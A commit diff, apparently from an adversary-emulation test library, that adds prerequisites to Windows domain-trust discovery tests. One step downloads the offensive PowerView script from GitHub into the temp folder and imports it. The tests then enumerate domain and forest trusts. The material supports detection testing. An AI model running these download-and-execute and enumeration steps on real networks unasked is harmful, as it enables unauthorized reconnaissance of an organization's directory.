T1482: add PowerView dependency & RSAT notes (#1041)

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>

atomics/T1482/T1482.yaml

@@ -20,6 +20,13 @@ atomic_tests:
     This technique has been used by the Trickbot malware family.
   supported_platforms:
   - windows
+  dependencies:
+  - description: |
+      nltest.exe from RSAT must be present on disk
+    prereq_command: |
+      WHERE nltest.exe >NUL 2>&1
+    get_prereq_command: |
+      echo Sorry RSAT must be installed manually
   executor:
     command: |
       nltest /domain_trusts
@@ -27,11 +34,27 @@ atomic_tests:
 - name: Powershell enumerate domains and forests
   auto_generated_guid: c58fbc62-8a62-489e-8f2d-3565d7d96f30
   description: |
-    Use powershell to enumerate AD information
+    Use powershell to enumerate AD information.
+    Requires the installation of PowerShell AD admin cmdlets via Windows RSAT or the Windows Server AD DS role.
   supported_platforms:
   - windows
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      PowerView PowerShell script must exist on disk
+    prereq_command: |
+      if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Invoke-WebRequest "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1" -OutFile "$env:TEMP\PowerView.ps1"
+  - description: |
+      RSAT PowerShell AD admin cmdlets must be installed
+    prereq_command: |
+      if ((Get-Command "Get-ADDomain") -And (Get-Command "Get-ADGroupMember")) { exit 0 } else { exit 1 }
+    get_prereq_command: |
+      Write-Host "Sorry RSAT must be installed manually"
   executor:
     command: |
+      Import-Module "$env:TEMP\PowerView.ps1"
       Get-NetDomainTrust
       Get-NetForestTrust
       Get-ADDomain